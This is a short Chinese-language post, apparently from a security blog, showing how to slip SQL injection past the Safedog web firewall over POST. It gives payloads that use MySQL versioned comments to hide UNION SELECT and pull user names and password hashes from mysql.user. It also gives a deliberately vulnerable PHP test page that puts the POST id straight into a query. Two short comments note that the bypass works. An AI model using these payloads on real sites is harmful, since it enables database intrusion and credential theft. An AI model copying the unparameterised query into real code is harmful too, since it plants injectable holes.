安全狗POST SQL注入.

yzmm
632 阅读
不知为何不拦POST的/*!XXX*/

3

id=1 and 1=2 union select 1,user,password from mysql.user limit 0,1

1

id=1200000  /*!union*//*!select*/(1),user,password from mysql.user limit 0,1

2

<?php
	$conn = mysql_connect("localhost","root","123456");
	mysql_select_db("test");
	$sql = "select * from user where id = ".$_POST['id'];
	echo $sql."<br/>";
	$result = mysql_query($sql,$conn);
	while ( $data = mysql_fetch_array ( $result ) ) {
		echo $data ['id']."---".$data ['username']."---".$data['password'].'<br/>';
	}
	mysql_close ( $conn );
?>

评论 (2)

neal
sql 能正常执行吗
neal
- - 没注意看 执行成了。 很奇怪 为什么 加了注释符号 还能执行呢

发表评论